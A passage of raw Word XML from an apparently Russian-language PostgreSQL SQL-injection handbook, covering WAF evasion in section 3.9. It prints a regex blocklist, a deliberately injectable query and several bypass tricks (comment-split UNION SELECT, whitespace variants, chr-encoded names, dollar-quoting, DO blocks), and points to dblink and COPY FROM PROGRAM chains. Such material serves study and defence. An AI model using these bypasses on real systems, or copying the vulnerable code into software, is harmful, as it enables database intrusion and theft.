        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"'\s*(OR|AND)\s+", re.IGNORECASE),       # 'OR / 'AND — инъекционные шаблоны</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bUNION\s+SELECT\b", re.IGNORECASE),    # классический UNION-канал</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"'\s*;", re.IGNORECASE),                 # завершение литерала + stacked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"--|/\*", re.IGNORECASE),                # SQL-комментарии любого вида</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b", re.IGNORECASE),  # DDL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\b(dblink|pg_read|pg_authid|pg_shadow|pg_sleep)\w*",    # опасные функции/каталоги</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    re.compile(r"OR\s+1\s*=\s*1", re.IGNORECASE),        # классическая тавтология</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waf_sanitize(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for pat in BLOCKED_PATTERNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if pat.search(value):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            raise HTTPException(status_code=400, detail="forbidden pattern")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: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 = waf_sanitize(q)</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id, title, body FROM articles WHERE title = '{q}'")</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Этот фильтр пропускает breakout-кавычку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(без неё атака на string-context невозможна, но и легитимные имена с апострофами сломаются), но блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дальнейшее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> опасное использование. Что 3.9.1–3.9.7 обходят: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Любая функция/каталог из чёрного списка</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 3.9.2/3.9.5 (собрать имя функции из chr/decode-байтов так, чтобы в payload-тексте подстроки не было), 3.9.3 (Unicode-escape для имён в идентификаторах через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`'OR`/`'AND` паттерн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 3.9.1 (если payload включает свой строковый литерал — пишется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 активирует подсчёт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3.9.6 (whitespace: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'\tOR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Unicode space, или альтернативные тавтологии без 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`UNION SELECT`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 3.9.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, регистр-вариации) или 3.9.3 (literal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через codepoint-ы вместо keyword-ов в случаях, когда они идут как значение, а не как ключевое слово).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комментарии** → 3.9.6 (вместо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 */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">? нет, тоже блочится; альтернатива: завершить payload синтаксически валидной квотой и без комментария).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DDL ключевые слова</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DROP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 3.9.6 (whitespace, регистр), но в большинстве случаев DDL не нужен в read-only injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный практический урок: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF блокирует синтаксис того, что атакующий пишет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; 3.9 переписывает payload в семантически эквивалентную форму с другим синтаксисом, который фильтр пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартная структура подразделов 3.9.1–3.9.7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая карточка строится по сжатой схеме:</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Что блокирует фильтр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкретный регекс/правило, против которого работает приём</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Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — какой payload идёт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(со ссылкой на 3.9.0 как уязвимый код), результирующий SQL</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Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после построения строки</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Почему этот приём проходит фильтр</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Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — со ссылкой на конкретный раздел лексики PG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w: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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">связанные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">источники</w:t>
      </w:r>
    </w:p>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 vs 3.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.6 включает whitespace tricks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если в payload вообще нужны несколько команд, это уже 3.5 + 3.9.6 как обходка. 3.9.6 чисто про обход символьного фильтра, не про мульти-команды.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 (comments) vs 3.9.6</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whitespace и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как нестандартный комментарий — формально пересекаются. Закреплено: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обхода whitespace-фильтра — в 3.9.6 (это обход символьного фильтра, конкретный случай);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для обхода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> комментариев — в 3.12.1 (это lexical edge case PG-парсера, не WAF-обход).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 vs 3.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9 — про обход input-фильтра. 3.16 — про injection в серверный код. Разные слои; пересечений нет.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(CVE-2025-1094) vs 3.9.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.7 — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">краткое упоминание</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE в контексте обхода фильтрации: формально CVE-2025-1094 — bug в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeLiteral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PQescapeIdentifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который превращает «защищённый» (правильно escape-нутый) payload в SQL injection при невалидном UTF-8. Полная хронология, цепочка с COPY TO PROGRAM (R21), CVSS score, патч-окно — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5</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Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">доставку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload-а через WAF, привилегии целевой роли определяются итоговой категорией атаки. Например: 3.9.1 (dollar-quoted) поверх 3.6.1 (dblink OOB) требует, чтобы у роли была USAGE на dblink (PUBLIC после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3.9.1 поверх 3.7.1 (COPY FROM PROGRAM) —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или SUPERUSER. См. соответствующие категории.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.1 Dollar-quoted strings $$...$$ и $tag$...$tag$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Класс правил, который пробивается этим приёмом, — не pattern-based WAF из 3.9.0 (там dollar-quoting не помогает напрямую), а:</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Apostrophe-escaping sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самописная функция в legacy-коде, которая «защищает» от инъекций удвоением апострофа: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value = value.replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Логика: «если в payload не будет одиночных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то нельзя ни закрыть строку, ни инжектировать». Sanitizer не знает про dollar-quoting.</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Count-based WAF-эвристика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — правило вида «отклонить запрос, если количество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значении параметра нечётное (unbalanced quote)» или «отклонить, если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встречается ≥ N раз». Часть rule-set Imperva и старых ModSecurity-конфигов; неактивна в современных CRS, но встречается в наследии.</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Stacked queries блокированы extended-протоколом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.5) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> упаковывает целую plpgsql-программу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одну</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-команду, которая проходит через extended protocol (один Parse/Bind/Execute). Это не про обход апострофного фильтра — это про обход ограничения «одна команда на запрос».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — обход apostrophe-escape sanitizer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Допустим, между приложением и БД стоит самописная sanitize-функция, защищающая ORDER BY (где параметризация драйвером не работает):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">def sanitize(value: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return value.replace("'",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uses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">order_by = sanitize(request.args["order"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
